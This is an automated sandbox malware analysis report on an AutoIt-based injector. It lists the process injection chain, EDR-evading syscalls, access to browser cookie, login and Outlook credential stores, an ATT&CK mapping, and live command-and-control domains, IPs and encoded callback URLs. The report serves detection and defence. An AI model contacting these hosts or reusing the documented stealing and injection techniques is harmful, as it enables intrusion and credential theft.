                Source: C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exeNtResumeThread: Direct from: 0x76EF36ACJump to behavior
                Source: C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exeNtMapViewOfSection: Direct from: 0x76EF2D1CJump to behavior
                Source: C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exeNtProtectVirtualMemory: Direct from: 0x76EE7B2EJump to behavior
                Source: C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BFCJump to behavior
                Source: C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exeNtQuerySystemInformation: Direct from: 0x76EF2DFCJump to behavior
                Source: C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exeNtReadFile: Direct from: 0x76EF2ADCJump to behavior
                Source: C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exeNtDelayExecution: Direct from: 0x76EF2DDCJump to behavior
                Source: C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exeNtQueryInformationProcess: Direct from: 0x76EF2C26Jump to behavior
                Source: C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exeNtResumeThread: Direct from: 0x76EF2FBCJump to behavior
                Source: C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exeNtCreateUserProcess: Direct from: 0x76EF371CJump to behavior
                Source: C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exeNtAllocateVirtualMemory: Direct from: 0x76EF3C9CJump to behavior
                Source: C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exeNtWriteVirtualMemory: Direct from: 0x76EF490CJump to behavior
                Source: C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exeNtSetInformationThread: Direct from: 0x76EE63F9Jump to behavior
                Source: C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exeNtClose: Direct from: 0x76EF2B6C
                Source: C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exeNtSetInformationThread: Direct from: 0x76EF2B4CJump to behavior
                Source: C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exeNtReadVirtualMemory: Direct from: 0x76EF2E8CJump to behavior
                Source: C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exeNtCreateKey: Direct from: 0x76EF2C6CJump to behavior
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\mobsync.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: NULL target: C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: NULL target: C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeThread register set: target process: 6448Jump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeThread APC queued: target process: C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exeJump to behavior
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2D6E008Jump to behavior
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeCode function: 0_2_006E87B1 LogonUserW,0_2_006E87B1
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeCode function: 0_2_00693B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00693B3A
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeCode function: 0_2_006948D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_006948D7
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeCode function: 0_2_006F4C7F mouse_event,0_2_006F4C7F
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\tfWjjV1LdT.exe"Jump to behavior
                Source: C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exeProcess created: C:\Windows\SysWOW64\mobsync.exe "C:\Windows\SysWOW64\mobsync.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeCode function: 0_2_006E7CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_006E7CAF
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeCode function: 0_2_006E874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_006E874B
                Source: tfWjjV1LdT.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: ldZEVEbpOrO.exe, 00000004.00000000.2230036275.0000000001B11000.00000002.00000001.00040000.00000000.sdmp, ldZEVEbpOrO.exe, 00000004.00000002.3896367594.0000000001B11000.00000002.00000001.00040000.00000000.sdmp, ldZEVEbpOrO.exe, 00000006.00000000.2382437884.0000000000E21000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
                Source: tfWjjV1LdT.exe, ldZEVEbpOrO.exe, 00000004.00000000.2230036275.0000000001B11000.00000002.00000001.00040000.00000000.sdmp, ldZEVEbpOrO.exe, 00000004.00000002.3896367594.0000000001B11000.00000002.00000001.00040000.00000000.sdmp, ldZEVEbpOrO.exe, 00000006.00000000.2382437884.0000000000E21000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: ldZEVEbpOrO.exe, 00000004.00000000.2230036275.0000000001B11000.00000002.00000001.00040000.00000000.sdmp, ldZEVEbpOrO.exe, 00000004.00000002.3896367594.0000000001B11000.00000002.00000001.00040000.00000000.sdmp, ldZEVEbpOrO.exe, 00000006.00000000.2382437884.0000000000E21000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: ldZEVEbpOrO.exe, 00000004.00000000.2230036275.0000000001B11000.00000002.00000001.00040000.00000000.sdmp, ldZEVEbpOrO.exe, 00000004.00000002.3896367594.0000000001B11000.00000002.00000001.00040000.00000000.sdmp, ldZEVEbpOrO.exe, 00000006.00000000.2382437884.0000000000E21000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeCode function: 0_2_006B862B cpuid 0_2_006B862B
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeCode function: 0_2_006C4E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_006C4E87
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeCode function: 0_2_006D1E06 GetUserNameW,0_2_006D1E06
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeCode function: 0_2_006C3F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_006C3F3A
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeCode function: 0_2_006949A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_006949A0

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.2308790702.0000000005B70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3895579056.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3896453631.0000000004A90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3896511474.0000000004AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3896622402.00000000031D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2307717085.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2308275736.0000000003BE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\mobsync.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
                Source: tfWjjV1LdT.exeBinary or memory string: WIN_81
                Source: tfWjjV1LdT.exeBinary or memory string: WIN_XP
                Source: tfWjjV1LdT.exeBinary or memory string: WIN_XPe
                Source: tfWjjV1LdT.exeBinary or memory string: WIN_VISTA
                Source: tfWjjV1LdT.exeBinary or memory string: WIN_7
                Source: tfWjjV1LdT.exeBinary or memory string: WIN_8
                Source: tfWjjV1LdT.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.2308790702.0000000005B70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3895579056.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3896453631.0000000004A90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3896511474.0000000004AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3896622402.00000000031D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2307717085.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2308275736.0000000003BE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeCode function: 0_2_00706283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00706283
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeCode function: 0_2_00706747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00706747
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts
                2
                Native API
                1
                DLL Side-Loading
                1
                Exploitation for Privilege Escalation
                1
                Disable or Modify Tools
                1
                OS Credential Dumping
                2
                System Time Discovery
                Remote Services1
                Archive Collected Data
                5
                Ingress Tool Transfer
                Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault AccountsScheduled Task/Job2
                Valid Accounts
                1
                Abuse Elevation Control Mechanism
                1
                Deobfuscate/Decode Files or Information
                21
                Input Capture
                1
                Account Discovery
                Remote Desktop Protocol1
                Data from Local System
                1
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading
                1
                Abuse Elevation Control Mechanism
                Security Account Manager2
                File and Directory Discovery
                SMB/Windows Admin Shares1
                Email Collection
                5
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                Valid Accounts
                2
                Obfuscated Files or Information
                NTDS116
                System Information Discovery
                Distributed Component Object Model21
                Input Capture
                5
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                Access Token Manipulation
                1
                DLL Side-Loading
                LSA Secrets151
                Security Software Discovery
                SSH3
                Clipboard Data
                Fallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
                Process Injection
                2
                Valid Accounts
                Cached Domain Credentials2
                Virtualization/Sandbox Evasion
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                Virtualization/Sandbox Evasion
                DCSync3
                Process Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                Access Token Manipulation
                Proc Filesystem1
                Application Window Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
                Process Injection
                /etc/passwd and /etc/shadow1
                System Owner/User Discovery
                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1588375 Sample: tfWjjV1LdT.exe Startdate: 11/01/2025 Architecture: WINDOWS Score: 100 28 www.logidant.xyz 2->28 30 www.izmirescortg.xyz 2->30 32 11 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Antivirus detection for URL or domain 2->44 46 Multi AV Scanner detection for submitted file 2->46 50 4 other signatures 2->50 10 tfWjjV1LdT.exe 2 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 30->48 process4 signatures5 62 Binary is likely a compiled AutoIt script file 10->62 64 Writes to foreign memory regions 10->64 66 Maps a DLL or memory area into another process 10->66 68 Switches to a custom stack to bypass stack traces 10->68 13 svchost.exe 10->13         started        process6 signatures7 70 Maps a DLL or memory area into another process 13->70 16 ldZEVEbpOrO.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 mobsync.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 ldZEVEbpOrO.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 logidant.xyz 45.141.156.114, 49994, 49995, 49996 YURTEH-ASUA Germany 22->34 36 aballanet.cat 134.0.14.158, 49941, 49954, 49972 CDMONsistemescdmoncomES Spain 22->36 38 6 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                tfWjjV1LdT.exe54%VirustotalBrowse
                tfWjjV1LdT.exe55%ReversingLabsWin32.Trojan.AutoitInject
                tfWjjV1LdT.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://www.madhf.tech/0mwe/?Kdr=RN-HMNoXj6pXm&KBEhCJ=I6/MvosI1M4GXnAC7bSYGFqrxYdgJTNe9tmkEszzRtOWIwRcIvXs05Ha3jXYoQpxdY5hB0FWQM1VzVFsJbVN+4NwIpTlqvPWS8Sl4p5VjB9j49JCBEhVmvR6biJ/0AaWeg==0%Avira URL Cloudsafe
                http://www.madhf.tech/0mwe/?Kdr=RN-HMNoXj6pXm&KBEhCJ=I6/MvosI1M4GXnAC7bSYGFqrxYdgJTNe9tmkEszzRtOWIwR0%Avira URL Cloudsafe
                http://www.aballanet.cat/6xrr/?KBEhCJ=HxJAUmNG5a+243k7lB56qNhkSq7m2edDyQfNvKnIMmllTqWhJmPDYD6FfyD5P2YCiK6XZxIiPJwBP5cvXMaBWZyS1GVQka4TzLjh3pjJtHZ6h8tdWKE4MgApWPfIsL675g==&Kdr=RN-HMNoXj6pXm100%Avira URL Cloudmalware
                http://www.canadavinreport.site/g3h7/?KBEhCJ=dyqW+SkpLS8uL5dRky9k7MKcOglS/8z1zEHoC4ozp/UuBc9Lrzv6UHKMHP5rOiU//FkNbu8cLS6TGHyjoU1BXuIfA/6aNcSUPn2xNM4zETNmyU4aFxTXIL5EZw83E41rkQ==&Kdr=RN-HMNoXj6pXm0%Avira URL Cloudsafe
                http://www.canadavinreport.site/g3h7/0%Avira URL Cloudsafe
                http://www.zkdamdjj.shop0%Avira URL Cloudsafe
                http://www.litespeedtech.com/error-page0%Avira URL Cloudsafe
                http://www.zkdamdjj.shop/kf1m/?KBEhCJ=gD/FPiA75bYZCbZDbB+WsVUzjKMJP+r4HqBHW8I3+Q/3qqcwdH4XqO3fnm/yt4rkfBlpHF229jnZH/lk0nBoRPOyc9x0vhFbku7Ub3qNJZbDXed1slXSq/MHP91YwZ61FA==&Kdr=RN-HMNoXj6pXm0%Avira URL Cloudsafe
                http://www.zkdamdjj.shop/kf1m/0%Avira URL Cloudsafe
                http://www.logidant.xyz/iuvu/0%Avira URL Cloudsafe
                http://www.izmirescortg.xyz/lnl7/?KBEhCJ=kAPJ1zL1a1XedmcrdtHAbU+8MxIg1b6JbBGKYGigv+9peDDnEk+ogR7nF5sJltA40tggf7QxXQcZwaMcwHfgfVGx56k02tXkAzZldWa3Ro5vlhsr06JocjtffJpgas7XnA==&Kdr=RN-HMNoXj6pXm0%Avira URL Cloudsafe
                http://www.laohub10.net/36be/0%Avira URL Cloudsafe
                http://www.logidant.xyz/iuvu/?KBEhCJ=4GSi4NjhieA+eby0NKQzTEPCPA5td1TZNopVgGr+MixqN2kv+x7vZ9YkKN38Qwr7I1LnRiqAhNhB07BIn5ynY1PA81WB0aqcrP8TCrRqA4T6i/Y0YCRnlTl6YfLJ6nzbiw==&Kdr=RN-HMNoXj6pXm0%Avira URL Cloudsafe
                http://www.canadavinreport.site/g3h7/?KBEhCJ=dyqW0%Avira URL Cloudsafe
                http://www.laohub10.net/36be/?KBEhCJ=zT+fCPSXWqCfWPgMnoOydtJKsJuCEtGx9/DVuG0pIlquWt59hgdSk8Rx6eVvndf2YPyLwPhL3z2g/EyQU+U7tD9cl/byRSbJ8t/R3+K3cKRBXN0bJbe4ZjKihmDBlTXN1Q==&Kdr=RN-HMNoXj6pXm0%Avira URL Cloudsafe
                http://www.aballanet.cat/6xrr/100%Avira URL Cloudmalware
                http://www.yunlekeji.top/t322/?Kdr=RN-HMNoXj6pXm&KBEhCJ=FCfXCbowRdQKA3bKzmWhb/MMDIYWCwffvgnpa1jm1l5RPo8GmzCZxrunal2GKioIIi33qnUs85PYplnvRA3XX9RPs5/iUffq0tmKE8rYJBtcI2bhCRGcMbzPlb/C9uxVPg==0%Avira URL Cloudsafe
                http://www.yunlekeji.top/t322/0%Avira URL Cloudsafe
                http://aballanet.cat/6xrr/?KBEhCJ=HxJAUmNG5a100%Avira URL Cloudmalware
                http://www.madhf.tech/0mwe/0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                www.izmirescortg.xyz
                104.21.36.62
                truefalse
                  high
                  www.madhf.tech
                  103.224.182.242
                  truefalse
                    high
                    fap-a13f5c64.faipod.com
                    165.154.96.210
                    truefalse
                      unknown
                      r0lqcud7.nbnnn.xyz
                      27.124.4.246
                      truefalse
                        high
                        logidant.xyz
                        45.141.156.114
                        truetrue
                          unknown
                          www.zkdamdjj.shop
                          188.114.96.3
                          truefalse
                            high
                            www.canadavinreport.site
                            185.27.134.206
                            truefalse
                              high
                              aballanet.cat
                              134.0.14.158
                              truetrue
                                unknown
                                www.logidant.xyz
                                unknown
                                unknowntrue
                                  unknown
                                  www.laohub10.net
                                  unknown
                                  unknownfalse
                                    high
                                    www.aballanet.cat
                                    unknown
                                    unknownfalse
                                      unknown
                                      www.yunlekeji.top
                                      unknown
                                      unknownfalse
                                        unknown
                                        NameMaliciousAntivirus DetectionReputation
                                        http://www.aballanet.cat/6xrr/?KBEhCJ=HxJAUmNG5a+243k7lB56qNhkSq7m2edDyQfNvKnIMmllTqWhJmPDYD6FfyD5P2YCiK6XZxIiPJwBP5cvXMaBWZyS1GVQka4TzLjh3pjJtHZ6h8tdWKE4MgApWPfIsL675g==&Kdr=RN-HMNoXj6pXmtrue
                                        • Avira URL Cloud: malware
                                        unknown
                                        http://www.canadavinreport.site/g3h7/?KBEhCJ=dyqW+SkpLS8uL5dRky9k7MKcOglS/8z1zEHoC4ozp/UuBc9Lrzv6UHKMHP5rOiU//FkNbu8cLS6TGHyjoU1BXuIfA/6aNcSUPn2xNM4zETNmyU4aFxTXIL5EZw83E41rkQ==&Kdr=RN-HMNoXj6pXmfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.madhf.tech/0mwe/?Kdr=RN-HMNoXj6pXm&KBEhCJ=I6/MvosI1M4GXnAC7bSYGFqrxYdgJTNe9tmkEszzRtOWIwRcIvXs05Ha3jXYoQpxdY5hB0FWQM1VzVFsJbVN+4NwIpTlqvPWS8Sl4p5VjB9j49JCBEhVmvR6biJ/0AaWeg==false
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.canadavinreport.site/g3h7/false
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.zkdamdjj.shop/kf1m/?KBEhCJ=gD/FPiA75bYZCbZDbB+WsVUzjKMJP+r4HqBHW8I3+Q/3qqcwdH4XqO3fnm/yt4rkfBlpHF229jnZH/lk0nBoRPOyc9x0vhFbku7Ub3qNJZbDXed1slXSq/MHP91YwZ61FA==&Kdr=RN-HMNoXj6pXmfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.logidant.xyz/iuvu/false
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.zkdamdjj.shop/kf1m/false
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.izmirescortg.xyz/lnl7/?KBEhCJ=kAPJ1zL1a1XedmcrdtHAbU+8MxIg1b6JbBGKYGigv+9peDDnEk+ogR7nF5sJltA40tggf7QxXQcZwaMcwHfgfVGx56k02tXkAzZldWa3Ro5vlhsr06JocjtffJpgas7XnA==&Kdr=RN-HMNoXj6pXmfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.yunlekeji.top/t322/?Kdr=RN-HMNoXj6pXm&KBEhCJ=FCfXCbowRdQKA3bKzmWhb/MMDIYWCwffvgnpa1jm1l5RPo8GmzCZxrunal2GKioIIi33qnUs85PYplnvRA3XX9RPs5/iUffq0tmKE8rYJBtcI2bhCRGcMbzPlb/C9uxVPg==false
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.aballanet.cat/6xrr/true
                                        • Avira URL Cloud: malware
                                        unknown
                                        http://www.laohub10.net/36be/false
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.laohub10.net/36be/?KBEhCJ=zT+fCPSXWqCfWPgMnoOydtJKsJuCEtGx9/DVuG0pIlquWt59hgdSk8Rx6eVvndf2YPyLwPhL3z2g/EyQU+U7tD9cl/byRSbJ8t/R3+K3cKRBXN0bJbe4ZjKihmDBlTXN1Q==&Kdr=RN-HMNoXj6pXmfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.logidant.xyz/iuvu/?KBEhCJ=4GSi4NjhieA+eby0NKQzTEPCPA5td1TZNopVgGr+MixqN2kv+x7vZ9YkKN38Qwr7I1LnRiqAhNhB07BIn5ynY1PA81WB0aqcrP8TCrRqA4T6i/Y0YCRnlTl6YfLJ6nzbiw==&Kdr=RN-HMNoXj6pXmfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.madhf.tech/0mwe/false
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.yunlekeji.top/t322/false
                                        • Avira URL Cloud: safe
                                        unknown
                                        NameSourceMaliciousAntivirus DetectionReputation
                                        https://duckduckgo.com/chrome_newtabmobsync.exe, 00000005.00000003.2497553805.00000000080CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://duckduckgo.com/ac/?q=mobsync.exe, 00000005.00000003.2497553805.00000000080CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://www.google.com/images/branding/product/ico/googleg_lodp.icomobsync.exe, 00000005.00000003.2497553805.00000000080CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              http://www.zkdamdjj.shopldZEVEbpOrO.exe, 00000006.00000002.3898070817.0000000004BA9000.00000040.80000000.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
